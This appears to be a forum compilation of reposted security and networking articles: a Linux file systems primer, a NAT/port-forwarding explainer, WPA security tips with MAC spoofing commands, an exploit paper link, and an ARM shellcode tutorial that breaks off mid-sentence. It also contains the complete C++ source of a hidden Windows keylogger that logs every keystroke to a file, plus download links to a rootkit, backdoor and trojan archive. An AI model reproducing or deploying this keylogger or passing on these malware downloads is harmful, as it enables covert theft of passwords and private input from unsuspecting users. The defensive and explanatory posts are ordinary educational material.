Nytro

Rootkits,Backdoors,Trojan s & Tunnels Download: http://rapidshare.com/files/98090332/Rootkit___Backdoor.part1.rar http://rapidshare.com/files/98093600/Rootkit___Backdoor.part2.rar http://rapidshare.com/files/98083123/Rootkit___Backdoor.part3.rar

Linux File Systems 101 Something every body should know about Linux file systems ---- INTRODUCTION ---- I'll talk today about the different and "commonly" used Linux file systems, as I see not so much people that really know the difference between them. And in fact there is a whole lot to it more than just generalizing the usage of each file system, they have different usage purposes and different futures that you might or might not want. Also I'd like to inform you that this article is NOT based on my personal experience of using the different file systems and I'd rather go with facts instead of following personal favorites as every case is different from the other. The information I gathered are freely available on the world wide web, and they are not special information whatsoever, meaning that anyone could find such information, but I thought a good short article about the subject will do no harm. This article will cover EXT2, EXT3, XFS and ReiserFS so no talking about any other "different" OS specific file system, so please don't bring other OS's file systems discussions over here. There will be no historical information here whatsoever, this article main purpose is to provide technical yet simple information about these various file systems to help you in the decision making process of choosing one over the other or better is mixing between them to maximize efficiency. ---- STRUCTURES ---- EXT2: File allocation: bitmap (free space), table (meta data) Bad blocks: table EXT3: Directory contents: table, H tree with dir_index* enabled File allocation: bitmap (free space), table (meta data) Bad block: table ReiserFS: Directory contents: B tree File allocation: bitmap XFS: Directory contents: B tree File allocation: B tree As we see here there are different structures, and they differ between the B trees and H trees, the B tree data structure keeps data sorted and allows searches, insertions, and deletions in logarithmic amortized time, it is commonly used in databases and file systems. In the other hand we have the H trees structure which is commonly used in VLSI as a clock distribution network (Basically it's a revised version of a B tree data structure for larger directories). * dir_index is an option that allows indexing which is turned on by typing the command tune2fs -O dir_index /dev/hdXXX. ---- LIMITS ---- EXT2: Max file size: 2-64 TiB Max number of files: 10^8 Max filename length: 255 bytes Max volume size: 16-32 TiB Allowed characters in filenames: Any byte except 'NUL' and 0x2F EXT3: Max file size: 16 GiB - 2 TiB Max number of files: Variable* Max filename length: 255 bytes Max volume size: 2-32 TiB Allowed characters in filenames: Any byte except 'NUL' and 0x2F ReiserFS: Max file size: 8 TiB Max number of files: 2^32 Max filename length: 4032 bytes, limited to 255 by Linux VFS (Virtual File System) Max volume size: 16 TiB Allowed characters in filenames: Any byte except 'NUL' and 0x2F XFS: Max file size: 8 EiB minus one byte (on x64 bit system) 16 TiB (on x32 bit system) Max filename length: 255 bytes Max volume size: 16 EiB Allowed characters in filenames: Any byte except 'NULL' * If V is the volume size in bytes, then the default number of inodes is given by V/(2^13) or the number of blocks, whichever is less. And the minimum is V/(2^23). The max number of subdirectories in one directory is fixed to 32000. I think the information above are self explanatory, so I don't have comments on this part of information except to get your attention on the difference between 'NUL' and 'NULL', they are in fact different and mean totally different things, the 'NUL' is a string termination character while 'NULL' means NO thing. ---- FEATURES ---- EXT2: Dates recorded: modification (mtime), attribute modification (ctime), access (atime) Date range: December 14, 1901 - January 18, 2038 Date resolution: 1s File system permission: POSIX Transparent compression: NO (available through patches) Transparent encryption: NO Supported OS's: Linux, BSD, Windows (through an IFS), Mac OS X EXT3: Dates recorded: modification (mtime), attribute modification (ctime), access (atime) Date range: December 14, 1901 - January 18, 2038 Date resolution: 1s, Nanosecond (using undocumented big i-node) Attributes: No-atime, append-only, synchronous-write, no-dump, h-tree (directory), immutable, journal, secure-delete, top (directory), allow-undelete File system permission: Unix permissions, ACLs and arbitrary security attributes (Linux 2.6 and later) Transparent compression: NO Transparent encryption: NO (provided at the block device level) Supported OS's: Linux, BSD, Windows (through an IFS) ReiserFS: Dates recorded: modification (mtime), attribute modification (ctime), access (atime) Date range: December 14, 1901 - January 18, 2038 Date resolution: 1s Forks: Extended attributes File system permission: Unix permissions, ACLs and arbitrary security attributes Transparent compression: NO Transparent encryption: NO Supported OS's: Linux XFS: Dates recorded: modification (mtime), attribute modification (ctime), access (atime) Date resolution: 1ns Attributes: YES File system permission: YES Transparent compression: NO Transparent encryption: NO (provided at the block device level) Supported OS's: IRIX, Linux, FreeBSD (experimental) ---- LINKS ---- http://www.virtualblueness.net/Ext2fs-overview/Ext2fs-overview-0.1-8.html http://www.google.com/search?hl=en&q=H+tree http://www.google.com/search?hl=en&q=B+tree http://www.google.com/search?hl=en&q=amortized+time http://www.google.com/search?hl=en&q=very+large+scale+integration http://www.google.com/search?hl=en&q=POSIX http://www.google.com/search?hl=en&q=Installable+File+System ---- FINAL WORD ---- As I said, these are the facts, however they might not reflect fixed performance, so everyone might encounter different results and different issues that is not the case with everybody else. Basically based on this information you will be able to decide which file system you going to need for your special usage, but I also advice you to seek opinions from experts that had past experiences with specific file systems and knows the tricks and tweaks to improve it or to how to keep disasters from happening. Sursa: Linux File Systems 101 - r00tsecurity

[C++] Simple KeyLogger using Keyboard Hook When invoking this program, you can optionally set an argument to specify the filename to output logs to. #include <Windows.h> #include <stdio.h> LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam); void log(char *str); char *translate(int vk,int up); int shift=0, caps=0; FILE *fd; int main(int argc, char *argv[]) { HWND self=GetConsoleWindow(); ShowWindow(self,SW_HIDE); HINSTANCE app=GetModuleHandle(NULL); SetWindowsHookEx(WH_KEYBOARD_LL,LowLevelKeyboardProc,app,0); MSG msg; char *fname = (char*)malloc(500); if (argc<2) { strcpy(fname,"kl"); } else { strcpy(fname,argv[1]); } fd=fopen(fname,"w"); while (GetMessage(&msg,NULL,0,0)>0) { ShowWindow(self,SW_HIDE); TranslateMessage(&msg); DispatchMessage(&msg); } fflush(fd); fclose(fd); return 0; } LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) { KBDLLHOOKSTRUCT *kb=(KBDLLHOOKSTRUCT *)lParam; char *str="[X]"; if (wParam==WM_KEYUP) { str=translate(kb->vkCode,1); } else if (wParam==WM_KEYDOWN) { str=translate(kb->vkCode,0); } if (str) log(str); return 0; } void log(char *str) { fwrite(str,1,strlen(str),fd); if (strstr(str," ")||strstr(str,"[CR]")) fflush(fd); } char* translate(int vk, int up) { if (up) { if ((vk==0x10)||(vk==0xa0)||(vk==0xa1)) shift=0; return 0; } else if ((vk==0x10)||(vk==0xa0)||(vk==0xa1)) { shift=1; return 0; } char *buf=(char*)malloc(16); memset(buf,0,16); if (vk<0x29) { switch (vk) { case 0x08: strcpy(buf,"[BS]"); break; case 0x09: strcpy(buf,"[TAB]"); break; case 0x0d: strcpy(buf,"[CR]"); break; case 0x14: caps^=1; break; case 0x20: buf[0]=' '; break; case 0x25: strcpy(buf,"[LT]"); break; case 0x26: strcpy(buf,"[UP]"); break; case 0x27: strcpy(buf,"[RT]"); break; case 0x28: strcpy(buf,"[DN]"); break; } return buf; } if (vk>0x69&&vk<0x70) { buf[0]=(char)(vk-0x40); } else if (vk>0x6f&&vk<0x88) { sprintf(buf,"[F%d]",vk-0x6f); } else if (isalpha(vk)) { if (!caps) if (shift) {buf[0]=(char)(toupper(vk));} else {buf[0]=(char)(tolower(vk));} else if (!shift) {buf[0]=(char)(toupper(vk));} else {buf[0]=(char)(tolower(vk));} } else { switch (vk) { case '1': if (!shift) {buf[0]=(char)vk;} else {buf[0]='!';} break; case '2': if (!shift) {buf[0]=(char)vk;} else {buf[0]='@';} break; case '3': if (!shift) {buf[0]=(char)vk;} else {buf[0]='#';} break; case '4': if (!shift) {buf[0]=(char)vk;} else {buf[0]='$';} break; case '5': if (!shift) {buf[0]=(char)vk;} else {buf[0]='%';} break; case '6': if (!shift) {buf[0]=(char)vk;} else {buf[0]='^';} break; case '7': if (!shift) {buf[0]=(char)vk;} else {buf[0]='&';} break; case '8': if (!shift) {buf[0]=(char)vk;} else {buf[0]='*';} break; case '9': if (!shift) {buf[0]=(char)vk;} else {buf[0]='(';} break; case '0': if (!shift) {buf[0]=(char)vk;} else {buf[0]=')';} break; case 0xba: if (!shift) {buf[0]=';';} else {buf[0]=':';} break; case 0xbb: if (!shift) {buf[0]='=';} else {buf[0]='+';} break; case 0xbc: if (!shift) {buf[0]=',';} else {buf[0]='<';} break; case 0xbd: if (!shift) {buf[0]='-';} else {buf[0]='_';} break; case 0xbe: if (!shift) {buf[0]='.';} else {buf[0]='>';} break; case 0xbf: if (!shift) {buf[0]='/';} else {buf[0]='?';} break; case 0xc0: if (!shift) {buf[0]='`';} else {buf[0]='~';} break; case 0xdb: if (!shift) {buf[0]='[';} else {buf[0]='{';} break; case 0xdc: if (!shift) {buf[0]='\\';} else {buf[0]='|';} break; case 0xdd: if (!shift) {buf[0]=']';} else {buf[0]='}';} break; case 0xde: if (!shift) {buf[0]='\'';} else {buf[0]='\"';} break; } } return buf; } Sursa: Simple Logger using Keyboard Hook - r00tsecurity

Network Address Translating explained If i have two computer on a single router is it possible for them to both have the same port open? For example, let's say i have port 80 open on 192.168.1.100 and i also have it open on 192.168.1.101. Lets say my IP adress to the internet is 67.44.33.22. It all depends what you mean by 'open' (Listening for incoming connections -or- Creating outbound connections). Since you cite port '80' in your example I will assume you wish to have two machines LISTENING on the same port number. Next it depends on what you mean when you say 'port' ... In particular 'who you are asking' ... If you ask each machine they may both claim to be using their port 80. But from the outside the case may appear differently. Such as in the example given above (See Zeedos post) where port 80 and 81 on your public address (The outside perspective) maps to either port 80 on computer 1 or port 80 on computer 2 (The inside, or 'hosts' perspective) This confusion will be addressed in answering your next question... Is it possible for an outside computer to be able to distinguish between the two? Lets take a look at what happens when your two computers (each with a unique 'inside' or 'private' address) both use the internet via a single IP provided by your ISP (The 'outside' or 'global' address)... and how your router distinguishes between all the incoming traffic and directs it to the appropriate machine. Lets assume your LAN (Your home network) uses the IP's 192.168.1.1 to 192.168.1.254 (That's 254 possible IPs) of which you are using 3... these are special 'inside only' IPs that have no meaning over the public internet. An example topology You have a LAN (Local Area Network) with 2 PC's and a router. The LAN has its own private addressing scheme (Normally 192.168.1.x or similar) and each device connected to the LAN gets an IP from this range. The routers IP is fixed (Often 192.168.1.100) It looks something like this... ,-------------------------, ,--|192.168.1.1 (Computer A) | L | |-------------------------| A |--|192.168.1.2 (Computer | N | '-------------------------' | ,-------------------------, '--|192.168.1.100 (ROUTER) | '-------------------------' Of course, thats the 'inside' or 'private' addressing scheme. As far as the internet is concerned you only have a single 'outside' IP address (The one provided by your ISP) ... Since the router acts as a gateway between the 'inside' (your private LAN) and the 'outside' (The big bad world) it needs to have a foot on both sides of the fence : ) So, as well as the 192.168.1.100 IP (used for talking to your lan) it also has an IP for talking to the public internet. It sits between the 'inside' and the 'outside' and forms a kind of bridge over which data can pass. If your ISP gives you the address 11.22.33.44 then your network will look something like the this... ,-------------------------, ,--|192.168.1.1 (Computer A) | L | |-------------------------| A |--|192.168.1.2 (Computer | N | '-------------------------' | ,-------------------------, '--|192.168.1.100 | inside ======| (ROUTER) |================ ,--|11.22.33.44 | outside | '-------------------------' I | S | P \|/ v Examine that for a moment and I think you will find it corresponds quite closely to what you probably see on your home network, give or take a few IP changes. Now settle down with a cup of tea cus this is gonna be a long ride and hopefully you're gonna learn a lot ; ) The basics (Or 'how your machines currently surf from a single IP') Now, when you set each computer to use 192.168.1.100 as its 'gateway' in the TCP/IP settings dialogue you are telling them where to send any traffic which does not belong in the 192.168.1.x range. Therefore, when you type Google into your web browser this is translated into googles IP address say... 62.62.62.62 which obviously is NOT a part of 192.168.1.x so it gets sent to your router. What happens next is magic : ) Well, not quite... but it is kinda clever : ) Lets follow what happens when Machine A (192.168.1.1) opens a temporary outgoing port, say 1025 ... and tries to connect to 62.62.62.62:80 (One of googles many webservers) Machine A sends a packet whos header contains... SOURCE = 192.168.1.1 :1025 DESTINATION = 62.62.62.62 :80 ... to the gateway (Your router) for passing to the outside world. Your router receives the packet, examines this header and makes a note in its 'translation table' INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 1025 62.62.62.62 Now, just as each computer has 65000+ ports, your router also has 65000+ ports. It looks to see if port 1025 is available and in this case we will assume it is. It decides to use ITS port 1025 to send your data and notes this fact in the translation table INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 1025 62.62.62.62 1025 This entry simply means, computer 192.168.1.1 (inside) used its port 1025 to send data to the public (outside) address 62.62.62.62... And the router sent this data from its own port 1025 (The 'outside port) It then sends the data... but only after changing the IP header packet received from LAN: SOURCE = 192.168.1.1 :1025 DESTINATION = 62.62.62.62 :80 Packet sent to ISP: SOURCE = 11.22.33.44 :1025 DESTINATION = 62.62.62.62 :80 Notice that the destination is the same, but now the packets source is your *ISP SUPPLIED* (or public) address. This is imortant since there may be billions of computers with the 'inside' IP 192.168.1.1 all over the world but there should only be one device with the unique public IP 11.22.33.44 (your router) ... and because of this, google knows unambiguously where to send the replies. Thats fine. But when your router receives a reply from google, how does it know which computer to send it to ? Well ... thats easy, it uses its translation table, but in reverse (Right to Left). INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 1025 62.62.62.62 1025 The IP header of the reply (google -> router) looks like this: SOURCE = 62.62.62.62 :13948 DESTINATION = 11.22.33.44 :1025 The packet is coming from OUTSIDE (It was received on the ISP-facing interface 11.22.33.44) and is from 62.62.62.62 (google) Does 62.62.62.62:1025 appear in the table under OUTSIDE IP/PORT ... Yes it does! So the router knows that it is a reply to Machine A (192.168.1.1) and should be redirected to 192.168.1.1:1025 It therefore changes the packet accordingly... packet as received from google: SOURCE = 62.62.62.62 :13948 DESTINATION = 11.22.33.44 :1025 Translated packet as placed on LAN: SOURCE = 62.62.62.62 :13948 DESTINATION = 192.168.1.1 :1025 .. And the packet is thus recieved by Machine A who is blissfully unaware of the header changes that made the whole thing work. Fantastic! How collisions are resolved when two machines use same Destination_IP / Local_PORT Okay, great, but thats just one machine... If Machine B also tried to contact google using a temporary outbound port 1025, but the routers port 1025 is 'in use' (possibly because of that last transaction involving Machine A) the router simply chooses a different port number. Thus it not only changes the IP from 192.168.1.2 to 11.22.33.44 but also the PORT from 1025 to perhaps 1027. And makes another note in the translation table: INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 1025 62.62.62.62 1025 192.168.1.2 1025 62.62.62.62 1027 Both machines have used the same inside port (1025) to talk to the same outside address (google at 62.62.62.62) but these are passed to google from different ports (1025 and 1027) and so, when replies come back to these two router ports it allows the router to identify where they belong) The translation table above will convert: Incoming data from outside address 62.62.62.62 arriving at routers outside port *1025* will be redirected to Machine A's port 1025 Meanwhile... Incoming data from outside address 62.62.62.62 arriving at routers outside port *1027* will be redirected to Machine B's port 1025 Again, it works : ) And thats why both your machines can access the internet simultaneously even though 'the internet' sees only one IP. Each individual communication is differentiated by dynamically assigned port numbers. Okay, here we get to the crux of your problem... Problems using listening ports Lets say your translation table now looks like this: INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 1025 62.62.62.62 1025 192.168.1.2 1025 62.62.62.62 1027 ... But Machine A is running a webserver which listens on port 80. When a packet arrives from some unknown address on the routers outside port 80 the translation table doesn't know what to do with it. There are no clues, so the router throws it away. Thats why NAT is often considered as a 'security improvement' ... unexpected incoming packets are thrown away before they ever get to a PC on your LAN. Good news for the security conscious - bad news if you're running a web server. Luckily, NAT provides a couple of fixes for this... Solution 1 - Default address translation The first fix is setting a default address. You can tell the router that if the dynamic translation table doesn't explicitly state how to handle an incoming packet then send it to a particular machine by default. This creates an table like the following: INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 1025 62.62.62.62 1025 192.168.1.2 1025 62.62.62.62 1027 ...otherwise... 192.168.1.1 - any any If the received packet matches the first line, its a reply to machine A If the received packet matches the second line, its a reply to machine B BUT, if no match is found... pass it to machine A and keep the destination port number intact. This means that Machine A will receive any unexpected rubbish (such as attacks, internet worms, portscans, etc...) along with legitimate queries to its port 80 (webserver) and any other servers it happens to run. This could be the basis of a simple DMZ or honeypot - one machine which receives all unannounced/unexpected incoming traffic and is thus exposed to risk. In a DMZ however, this machine would always be isolated from the actual LAN so that infections and attacks against this machine could not then spread to the other machines. Solution 2 - Port Forwarding (Static Port Translation) The next technique is far more useful. You can explicitly connect a routers outside port to a particular inside machine and port - this is commonly called 'port forwarding' and is normally used when an application or server requires a 'listening port' such as a webserver or, more commonly, an online-game or peer-to-peer program. Here we tell the router ... if anyone sends anything to your port 80 ... pass it to machine A's port 80 INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 80 anyone 80 Useful for a webserver. Unfortunately, it means that if Machine B wants to use a webserver it MUST use a different outside port number (Remember, the outside port number is what other people see) Following from the example provided by Zeedo earlier... we can tell the router that if anything arrives at the routers port 80 it goes to Machine A's webserver, and if anything arrives at port 81 it goes to machine B's webserver. INSIDE IP INSIDE PORT OUTSIDE IP OUTSIDE PORT --------------------------------------------------------------- 192.168.1.1 80 anyone 80 192.168.1.2 80 anyone 81 Note that although the world sees ONE IP with a webserver on port 80 and another webserver on the non-standard port 81 internally both machines are using port 80. See below how the public perception of your two webservers differs from the reality of your LAN setup. Internets view Reality ---------------- ------- 11.22.33.44:80 = 192.168.1.1:80 11.22.33.44:81 = 192.168.1.2:80 Specific applications / Applications on multiple machines Some applications allow you to SPECIFY which ports it should listen on. An example of this is the common filesharing program eMule/eDonkey. In the 'network settings' options you can specify the listening port. You can use this feature to your advantage if two users on your network both wish to use eMule ... eMule by default likes to listen on: 4662 (to TCP connections) 4672 (to UDP datagrams) First... Set Machine A's eMule to listen on port 11662 and 11672 Set Machine B's eMule to listen on port 12662 and 12672 Note that I've kept most of the number intact, as an aide to memory more than anything else. But I've prepended 11xxx (For the machine at 192.168.1.1) and 12xxx (For the machine at 192.168.1.2) You can then tell your router... Forward anything arriving on port range 11000-11999 to 192.168.1.1 Forward anything arriving on port range 12000-12999 to 192.168.1.2 This means that you never need to touch the router again. If, say, your sister wants to add a chat client that likes to listen on port 9990 she simply changes it to 12990 (If shes on machine and the router is already set up to forward those packets to her machine. The same chat client on machine A would be using 11990 and the router knows (by the range given) which machine any incoming packet is bound for. Things to consider before configuring NAT All of the examples given here require each machine to have a STATIC IP ... Ie, the 192.168.1.1 and 192.168.1.2 assignments NEVER change. Normally when you use a router it gives out random IP's in the 192.168.1.x range. This works for outgoing NAT/PAT but NOT when you want to run a server or some application that requires a listening port (Or, in the case of most peer-to-peer it will WORK, but slowly being denied the ability to accept connections unexpectedly) So, first up ... Set up static IPs for all machines in your LAN And then... Set up port forwarding (or a default mapping) as required to suit your webserver and other listening applications How to configure NAT on your router... How to do this varies from router to router... luckily theres a site which not only explains how to set up most common routers for static IP and port mapping but it also contains a list of common games and applications which require port mapping to run successfully and which ports you need to map. So, For further information (with detailed screenshots) visit... Here is the site: PortForward.com - Port Forwarding Guides Listed by Manufacturer and Model Applications with well-known ports Unlike the emule example above, some applications have 'expected' port numbers such as port:80 for Webservers. Not using the correct port number can cause confusion for those trying to reach your site. This can be more of a problem. Lets say you want to host 2 websites both using public port 80 ... either from a single machine (quite simple, most webservers can be configured to host multiple sites from a single IP & PORT) or from multiple machines (More difficult for the home user but can be done if you really need to) If this applies to you then there ARE workarounds. Post exactly what you're trying to achieve and I'm sure we can find a suitable solution for you. Final note (if for some reason Address Translation really interests you) Whilst I (and others) have referred to this forwarding mechanism as NAT (Network Address Translation) for simplicity it is actually inaccurate. The correct term is PAT (Port Address Translation) or NAPT (Network Adress Port Translation) since it uses the 'PORT' to differentiate between different 'inside' addresses and ports - NAT is actually a much older and less flexible concept however you will probably find that your router refers to this as NAT rather than PAT. The traditional NAT is formally described in 'RFC 1631' (look on Internet FAQ Archives - Online Education - faqs.org for the RFC document) and is a good place to start learning about how NAT originated. You'll notice that it doesn't provide for most of the features we've described here today - although you will discover some new ones I didn't cover : ) However, knowing the difference between standard NAT and the more common PAT is important when shopping for a router. Whilst most routers that boast 'NAT' will also provide 'PAT' this will not always be the case ... particularly as we move towards IPv6. NAT will always be around, but PAT/NAPT are dirty (but neccessary) workarounds for the limitations in IPv4. Though PAT/NAPT is predominant currently it will be far less common after IPv6 becomes the predominant end-to-end standard. Use google to compare and contrast... - Outgoing (or traditional) NAT - Bi-directional (or 2-way) NAT - Overloaded or 'Port-Based' NAT (PAT / NAPT) - Overlapped or 'Twice' NAT (2NAT) Caveat Tinkerer One last thing to note about PAT/NAPT is that it is NOT transparent. It CAN cause problems since it is not only the headers that need changing, some common protocols (Such as FTP for example) also carry IP data in upper layers which also needs to be changed. Some routers will detect and correct these upper layers too but many domestic routers do not, if you have problems with specific protocols contact your router manufacturer and find out whether your router has such capabilities or if the extent of its translation is confined to the IP and transport layers. Even where upper layers of such protocols ARE handled by the router they may not be handled in all cases... for example, if the packet is fragmented. And many less common protocols (such as proprietary ones used in games and messaging applications) won't have any upper-layer translation requirements serviced at all. But, for the most part it should work. Hope you at least skipped through that and picked up one or two key concepts that help you understand how your current network gets things done. Knowing HOW Address Translation works will help you understand how to fix it when it doesn't : ) But I reiterate ... It sounds like you want to host 2 websites both using a public port 80... either: from a single machine (quite simple, most webservers can be configured to host multiple sites from a single IP & PORT) -or- from multiple machines (More difficult for the home user but can be done if you really need to) If this applies to you then there ARE workarounds. Post exactly what you're trying to achieve and I'm sure we can find a more suitable solution for you. -Meds Sursa: Security Forums :: View topic - Network Address Translating explained

How To Crack WPA / WPA2 - Security Myths,Tips,Conclusion WPA-PSK Security Myths Although not strictly related to WPA-PSK cracking, there are two security myths I've seen pop up here at SmallNetBuilder and around the web that I'd like to say a few words about. Myth 1: Disabling the SSID Broadcast Secures your WLAN "Cloaking" your SSID might sound good on the surface. But programs like Kismet that are capable of monitoring wireless network traffic are also able to "decloak" access points by listening to traffic between the clients and the access point. For Kismet, this process takes only a few minutes of relatively light network traffic. Disabling the SSID broadcast really makes it only slightly harder for potential attackers to connect to your AP (they now have to type the SSID instead of clicking on it). Myth 2: Filtering MAC Addresses Secures Your WLAN This idea again sounds good on the surface: limit the computers that can connect by their MAC addresses. There are two problems with this technique. 1) Physically maintaining the table of acceptable MAC addresses becomes more burdensome as your network grows. 2) MAC addresses can be easily spoofed. Chances are, if you are being attacked by someone who has the know-how to get past WPA, they will most likely spoof their MAC when they connect anyway, to avoid detection in your router's logs (by a possible failed MAC filter pass). Kismet, in particular, excels at this with its AP "clients" view which lists, among other things, client MAC addresses. Spoofing your MAC address (in Linux) is as simple as this: bt ~ # ifconfig ath0 hw ether AA:BB:CC:DD:EE:FF bt ~ # ifconfig ath0 up bt ~ # ifconfig ath0 ath0 Link encap:Ethernet HWaddr AA:BB:CC:DD:EE:FF UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:26 errors:0 dropped:0 overruns:0 frame:0 TX packets:1 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1092 (1.0 KiB) TX bytes:590 (590.0 WPA-PSK Security Tips You know how to break weak WPA-PSK keys. Now make sure that it doesn't happen to you by using two simple techniques. Use long and strong passphrases! The longer and more random the password, the better. A WPA key is a computer passphrase, and by that I mean that the computer is the one that has to remember it. All you have to do as the user is type it in once and you're ready to go. So, generate a very long, random passphrase, write it down and put it in a not-so-obvious place. Writing down a passphrase is normally a cardinal sin for security. But in a SOHO setting, it's a reasonable tradeoff between security and convenience. Frankly, you're much more susceptible to wireless pirates parked outside your apartment (or next door) using the tools I've just described than you are to someone socially-engineering your wife into giving out your wireless LAN key. And even then, wouldn't it be nice if the key took a half-hour for her to read over the phone, giving you a chance to step in and save the day? So, generate a nasty, long computer passphrase, write it down on a sticky-note, enter it in your router and clients, then stick that sticky-note someplace secure (not to the top of the router!) Change your SSID Since the key is salted with the SSID, it makes sense to change your AP's SSID to render the precomputed hash tables useless (assuming you change it to something non-obvious). This forces the attacker to start from square one by either generating a hash table or using just a straight dictionary attack. Conclusion So, now you know how crackers can attack wireless networks that use weak WPA / WPA2 PSK keys and the simple countermeasures that you can take to ensure that it doesn't happen to you. With a strong, long key and good security practices, a wireless LAN secured by WPA / WPA2 is definitely not an easy target. Sursa: How To Crack WPA / WPA2 - Security Myths,Tips,Conclusion - SmallNetBuilder

Exploiting Stack Overflows in the Linux Kernel Download: In this post, I’ll introduce an exploitation technique for kernel stack overflows in the Linux kernel. Keep in mind this does not refer to buffer overflows on the kernel stack (whose exploitability is well understood), but rather the improper expansion of the kernel stack causing it to overlap with critical structures which may be subsequently corrupted. This is a vulnerability class in the Linux kernel that I do not believe have been exploited publicly in the past, but is relevant due to a recent vulnerability in the Econet packet family. Online: jon.oberheide.org - blog - exploiting stack overflows in the linux kernel Download: http://www.exploit-db.com/download_pdf/15634

How to Create a Shellcode on ARM Architecture Title: [English] How to create a shellcode on ARM architecture ? Language: English Author: Jonathan Salwan - twitter: @shell_storm Translated by: Arona Ndiaye Date: 2010-11-25 Original version: .:HowTo.Shell-Storm.org:. | How to create a shellcode on ARM architecture ? I - Introduction to the ARM architecture ========================================= The ARM architecture was originally conceived for a computer sold by Acorn. It morphed to then become an independent offer in the market of Embedded Computing. ARM is the acronym for Advanced Risk Machine, formerly known as Acorn Risk Machine. The most famous core is the ARM7TDMI which is graced with 3 pipeline levels. The ARM7TDMI even has a second set of instructions called THUMB which allows 16-bits addressing, and significant memory gains especially in the field of embedded computing. The ARM architecture is also quite present in the field of Mobile Computing. Numerous operating systems have been ported to that architecture. A non-exhaustive list includes: Linux (used by Maemo on the N900 and Android on the Nexus One), Symbian S60 with the Nokia N97 or Samsung Player HD, iPhone with the iPhone and iPad and Windows Mobile. ARM Ltd followed up by releasing the ARM9 core which shifted to a five stage pipeline, reducing the number of logical operations per clock cycle and therefore nearly doubling the clock frequency. II - ARM/Linux shellcode: first attempt ======================================== For the remainder of this document, all tests are assumed to be running on a ARM926EJ-S core. Let's start by having a look at the register conventions. Register Alt. Name Usage r0 a1 First function argument Integer function result Scratch register r1 a2 Second function argument Scratch register r2 a3 Third function argument Scratch register r3 a4 Fourth function argument Scratch register r4 v1 Register variable r5 v2 Register variable r6 v3 Register variable r7 v4 Register variable r8 v5 Register variable r9 v6 rfp Register variable Real frame pointer r10 sl Stack limit r11 fp Argument pointer r12 ip Temporary workspace r13 sp Stack pointer r14 lr Link register Workspace r15 pc Program counter So registers r0 to r3 will be dealing with function parameters. Registers r4 to r9 will be for variables. On the other hand register r7 will store the address of the Syscall to execute. Register r13 points to the stack and register r15 points to the next address to execute. These two registers can be compared to the ESP and EIP registers under x86, even though register operations greatly differ between ARM and x86. Let's start by writing a shellcode that will first call the syscall _write and then the _exit one. We first need to know the address of the syscalls. We'll do as we usually do: root@ARM9:~# cat /usr/include/asm/unistd.h | grep write #define __NR_write (__NR_SYSCALL_BASE+ 4) #define __NR_writev (__NR_SYSCALL_BASE+146) #define __NR_pwrite64 (__NR_SYSCALL_BASE+181) #define __NR_pciconfig_write (__NR_SYSCALL_BASE+273) root@ARM9:~# cat /usr/include/asm/unistd.h | grep exit #define __NR_exit (__NR_SYSCALL_BASE+ 1) #define __NR_exit_group (__NR_SYSCALL_BASE+248) Ok, so we have 4 for _write and 1 for _exit. We know that _write consumes three arguments: write(int __fd, __const void *__buf, size_t __n) Which gives us: r0 => 1 (output) r1 => shell-storm.org\n (string) r2 => 16 (strlen(string)) r7 => 4 (syscall) r0 => 0 r7 => 1 Here's what we get in assembly: root@ARM9:/home/jonathan/shellcode/write# cat write.s .section .text .global _start _start: # _write() mov r2, #16 mov r1, pc <= r1 = pc add r1, #24 <= r1 = pc + 24 (which points to our string) mov r0, $0x1 mov r7, $0x4 svc 0 # _exit() sub r0, r0, r0 mov r7, $0x1 svc 0 .ascii "shell-storm.org\n" root@ARM9:/home/jonathan/shellcode/write# as -o write.o write.s root@ARM9:/home/jonathan/shellcode/write# ld -o write write.o root@ARM9:/home/jonathan/shellcode/write# ./write shell-storm.org root@ARM9:/home/jonathan/shellcode/write# root@ARM9:/home/jonathan/shellcode/write# strace ./write execve("./write", ["./write"], [/* 17 vars */]) = 0 write(1, "shell-storm.org\n"..., 16shell-storm.org ) = 16 exit(0) Everything seems to work fine so far, however in order create our shellcode, we should have no null bytes, and our code is full of them. root@ARM9:/home/jonathan/shellcode/write# objdump -d write write: file format elf32-littlearm Disassembly of section .text: 00008054 <_start>: 8054: e3a02010 mov r2, #16 ; 0x10 8058: e1a0100f mov r1, pc 805c: e2811018 add r1, r1, #24 8060: e3a00001 mov r0, #1 ; 0x1 8064: e3a07004 mov r7, #4 ; 0x4 8068: ef000000 svc 0x00000000 806c: e0400000 sub r0, r0, r0 8070: e3a07001 mov r7, #1 ; 0x1 8074: ef000000 svc 0x00000000 8078: 6c656873 stclvs 8, cr6, [r5], #-460 807c: 74732d6c ldrbtvc r2, [r3], #-3436 8080: 2e6d726f cdpcs 2, 6, cr7, cr13, cr15, {3} 8084: 0a67726f beq 19e4a48 <__data_start+0x19d49c0> Under ARM, we have what is called the THUMB MODE which allows us to use 16 bits addressing for our calls as opposed to 32 bits, which does simplify our life at this stage. root@ARM9:/home/jonathan/shellcode/write# cat write.s .section .text .global _start _start: .code 32 # Thumb-Mode on add r6, pc, #1 bx r6 .code 16 # _write() mov r2, #16 mov r1, pc add r1, #12 mov r0, $0x1 mov r7, $0x4 svc 0 # _exit() sub r0, r0, r0 mov r7, $0x1 svc 0 .ascii "shell-storm.org\n" root@ARM9:/home/jonathan/shellcode/write# as -mthumb -o write.o write.s root@ARM9:/home/jonathan/shellcode/write# ld -o write write.o root@ARM9:/home/jonathan/shellcode/write# ./write shell-storm.org When compiling, please use "-mthumb" to indicate that we are switching to "Thumb Mode". The astute reader will have noticed that I have changed the value of the constant being added to r1. Instead of the original "add r1, #24", I'm doing "add r1, #12" since we have now switched to "thumb mode", the address where my chain is at, has been halved. Let's see what 